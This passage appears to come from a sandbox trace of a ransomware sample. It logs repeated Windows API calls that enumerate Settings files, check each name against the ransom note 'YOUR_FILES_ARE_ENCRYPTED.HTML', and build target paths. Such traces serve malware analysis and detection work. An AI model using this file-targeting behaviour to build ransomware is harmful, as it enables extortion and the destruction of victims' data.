returned=".settingcontent-ms" [0121.602] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1488bb9, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1488bb9, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x238ab028, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms", cAlternateFileName="AAEDFB~1.SET")) returned 1 [0121.602] StrStrIW (lpFirst="AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.602] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms") returned 181 [0121.602] PathFindExtensionW (pszPath="AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms") returned=".settingcontent-ms" [0121.602] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.602] PathFindExtensionW (pszPath="AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms") returned=".settingcontent-ms" [0121.602] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c6e696, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1c6e696, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x421, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageLockScreen.settingcontent-ms", cAlternateFileName="AA6364~1.SET")) returned 1 [0121.603] StrStrIW (lpFirst="AAA_SettingsPageLockScreen.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.603] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageLockScreen.settingcontent-ms") returned 171 [0121.603] PathFindExtensionW (pszPath="AAA_SettingsPageLockScreen.settingcontent-ms") returned=".settingcontent-ms" [0121.603] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.603] PathFindExtensionW (pszPath="AAA_SettingsPageLockScreen.settingcontent-ms") returned=".settingcontent-ms" [0121.603] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29b1a2e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x29b1a2e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x403, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageMaps.settingcontent-ms", cAlternateFileName="AA31EA~1.SET")) returned 1 [0121.604] StrStrIW (lpFirst="AAA_SettingsPageMaps.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.604] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageMaps.settingcontent-ms") returned 165 [0121.604] PathFindExtensionW (pszPath="AAA_SettingsPageMaps.settingcontent-ms") returned=".settingcontent-ms" [0121.604] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.604] PathFindExtensionW (pszPath="AAA_SettingsPageMaps.settingcontent-ms") returned=".settingcontent-ms" [0121.604] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3767165, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x3767165, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x42b, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageMultiTasking.settingcontent-ms", cAlternateFileName="AA9989~1.SET")) returned 1 [0121.604] StrStrIW (lpFirst="AAA_SettingsPageMultiTasking.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.604] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageMultiTasking.settingcontent-ms") returned 173 [0121.604] PathFindExtensionW (pszPath="AAA_SettingsPageMultiTasking.settingcontent-ms") returned=".settingcontent-ms" [0121.604] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.604] PathFindExtensionW (pszPath="AAA_SettingsPageMultiTasking.settingcontent-ms") returned=".settingcontent-ms" [0121.604] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f26c92, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x3f26c92, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44e, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms", cAlternateFileName="AA619A~1.SET")) returned 1 [0121.604] StrStrIW (lpFirst="AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.604] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms") returned 180 [0121.604] PathFindExtensionW (pszPath="AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms") returned=".settingcontent-ms" [0121.604] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.604] PathFindExtensionW (pszPath="AAA_SettingsPageNetworkAirplaneMode.settingcontent-ms") returned=".settingcontent-ms" [0121.604] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55a6f05, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x55a6f05, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x430, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageNetworkDialup.settingcontent-ms", cAlternateFileName="AA0465~1.SET")) returned 1 [0121.604] StrStrIW (lpFirst="AAA_SettingsPageNetworkDialup.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.604] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkDialup.settingcontent-ms") returned 174 [0121.604] PathFindExtensionW (pszPath="AAA_SettingsPageNetworkDialup.settingcontent-ms") returned=".settingcontent-ms" [0121.604] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.604] PathFindExtensionW (pszPath="AAA_SettingsPageNetworkDialup.settingcontent-ms") returned=".settingcontent-ms" [0121.604] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d8cca0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5d8cca0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44e, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageNetworkDirectAccess.settingcontent-ms", cAlternateFileName="AA896E~1.SET")) returned 1 [0121.604] StrStrIW (lpFirst="AAA_SettingsPageNetworkDirectAccess.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.604] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkDirectAccess.settingcontent-ms") returned 180 [0121.604] PathFindExtensionW (pszPath="AAA_SettingsPageNetworkDirectAccess.settingcontent-ms") returned=".settingcontent-ms" [0121.604] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.604] PathFindExtensionW (pszPath="AAA_SettingsPageNetworkDirectAccess.settingcontent-ms") returned=".settingcontent-ms" [0121.604] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67fb07e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x67fb07e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43a, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageNetworkEthernet.settingcontent-ms", cAlternateFileName="AA39CE~1.SET")) returned 1 [0121.604] StrStrIW (lpFirst="AAA_SettingsPageNetworkEthernet.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.604] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkEthernet.settingcontent-ms") returned 176 [0121.604] PathFindExtensionW (pszPath="AAA_SettingsPageNetworkEthernet.settingcontent-ms") returned=".settingcontent-ms" [0121.604] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.605] PathFindExtensionW (pszPath="AAA_SettingsPageNetworkEthernet.settingcontent-ms") returned=".settingcontent-ms" [0121.605] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fea519, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x8fea519, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms", cAlternateFileName="AAF71D~1.SET")) returned 1 [0121.605] StrStrIW (lpFirst="AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.605] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms") returned 183 [0121.605] PathFindExtensionW (pszPath="AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms") returned=".settingcontent-ms" [0121.605] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.605] PathFindExtensionW (pszPath="AAA_SettingsPageNetworkMobileBroadband.settingcontent-ms") returned=".settingcontent-ms" [0121.605] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99e63e4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x99e63e4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms", cAlternateFileName="AA6FDD~1.SET")) returned 1 [0121.605] StrStrIW (lpFirst="AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.605] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms") returned 181 [0121.605] PathFindExtensionW (pszPath="AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms") returned=".settingcontent-ms" [0121.605] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.605] PathFindExtensionW (pszPath="AAA_SettingsPageNetworkMobileHotspot.settingcontent-ms") returned=".settingcontent-ms" [0121.605] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a5e70, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xa1a5e70, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x42b, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageNetworkProxy.settingcontent-ms", cAlternateFileName="AA16BE~1.SET")) returned 1 [0121.605] StrStrIW (lpFirst="AAA_SettingsPageNetworkProxy.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.605] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkProxy.settingcontent-ms") returned 173 [0121.605] PathFindExtensionW (pszPath="AAA_SettingsPageNetworkProxy.settingcontent-ms") returned=".settingcontent-ms" [0121.605] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.605] PathFindExtensionW (pszPath="AAA_SettingsPageNetworkProxy.settingcontent-ms") returned=".settingcontent-ms" [0121.605] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacd2f90, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xacd2f90, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x421, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageNetworkVPN.settingcontent-ms", cAlternateFileName="AAE339~1.SET")) returned 1 [0121.605] StrStrIW (lpFirst="AAA_SettingsPageNetworkVPN.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.605] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkVPN.settingcontent-ms") returned 171 [0121.605] PathFindExtensionW (pszPath="AAA_SettingsPageNetworkVPN.settingcontent-ms") returned=".settingcontent-ms" [0121.605] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.605] PathFindExtensionW (pszPath="AAA_SettingsPageNetworkVPN.settingcontent-ms") returned=".settingcontent-ms" [0121.605] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5515c4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb5515c4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x426, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageNetworkWiFi.settingcontent-ms", cAlternateFileName="AA60E9~1.SET")) returned 1 [0121.605] StrStrIW (lpFirst="AAA_SettingsPageNetworkWiFi.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.605] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkWiFi.settingcontent-ms") returned 172 [0121.605] PathFindExtensionW (pszPath="AAA_SettingsPageNetworkWiFi.settingcontent-ms") returned=".settingcontent-ms" [0121.605] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.605] PathFindExtensionW (pszPath="AAA_SettingsPageNetworkWiFi.settingcontent-ms") returned=".settingcontent-ms" [0121.605] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad4de5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbad4de5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43f, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageNetworkWorkplace.settingcontent-ms", cAlternateFileName="AA3ED6~1.SET")) returned 1 [0121.605] StrStrIW (lpFirst="AAA_SettingsPageNetworkWorkplace.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.605] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageNetworkWorkplace.settingcontent-ms") returned 177 [0121.605] PathFindExtensionW (pszPath="AAA_SettingsPageNetworkWorkplace.settingcontent-ms") returned=".settingcontent-ms" [0121.605] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.605] PathFindExtensionW (pszPath="AAA_SettingsPageNetworkWorkplace.settingcontent-ms") returned=".settingcontent-ms" [0121.606] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbb9ac6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbbb9ac6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43f, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms", cAlternateFileName="AAEEC3~1.SET")) returned 1 [0121.606] StrStrIW (lpFirst="AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.606] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms") returned 177 [0121.606] PathFindExtensionW (pszPath="AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms") returned=".settingcontent-ms" [0121.606] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.606] PathFindExtensionW (pszPath="AAA_SettingsPagePCSystemAutoPlay.settingcontent-ms") returned=".settingcontent-ms" [0121.606] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0caaae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0caaae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x444, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPagePCSystemBluetooth.settingcontent-ms", cAlternateFileName="AA6CEB~1.SET")) returned 1 [0121.606] StrStrIW (lpFirst="AAA_SettingsPagePCSystemBluetooth.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.606] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemBluetooth.settingcontent-ms") returned 178 [0121.606] PathFindExtensionW (pszPath="AAA_SettingsPagePCSystemBluetooth.settingcontent-ms") returned=".settingcontent-ms" [0121.606] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.606] PathFindExtensionW (pszPath="AAA_SettingsPagePCSystemBluetooth.settingcontent-ms") returned=".settingcontent-ms" [0121.606] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2484cb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc2484cb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43a, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPagePCSystemDevices.settingcontent-ms", cAlternateFileName="AACA0F~1.SET")) returned 1 [0121.606] StrStrIW (lpFirst="AAA_SettingsPagePCSystemDevices.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.606] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemDevices.settingcontent-ms") returned 176 [0121.606] PathFindExtensionW (pszPath="AAA_SettingsPagePCSystemDevices.settingcontent-ms") returned=".settingcontent-ms" [0121.606] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.606] PathFindExtensionW (pszPath="AAA_SettingsPagePCSystemDevices.settingcontent-ms") returned=".settingcontent-ms" [0121.606] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6c0872, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc6c0872, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms", cAlternateFileName="AAD2D6~1.SET")) returned 1 [0121.606] StrStrIW (lpFirst="AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.606] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms") returned 183 [0121.606] PathFindExtensionW (pszPath="AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms") returned=".settingcontent-ms" [0121.606] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.606] PathFindExtensionW (pszPath="AAA_SettingsPagePCSystemDeviceSettings.settingcontent-ms") returned=".settingcontent-ms" [0121.606] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcea6833, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xcea6833, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43a, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPagePCSystemDisplay.settingcontent-ms", cAlternateFileName="AA6364~2.SET")) returned 1 [0121.606] StrStrIW (lpFirst="AAA_SettingsPagePCSystemDisplay.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.606] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePCSystemDisplay.settingcontent-ms") returned 176 [0121.606] PathFindExtensionW (pszPath="AAA_SettingsPagePCSystemDisplay.settingcontent-ms") returned=".settingcontent-ms" [0121.606] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.606] PathFindExtensionW (pszPath="AAA_SettingsPagePCSystemDisplay.settingcontent-ms") returned=".settingcontent-ms" [0121.606] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd429d08, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xd429d08, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x42b, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPagePCSystemInfo.settingcontent-ms", cAlternateFileName="AA018C~1.SET")) 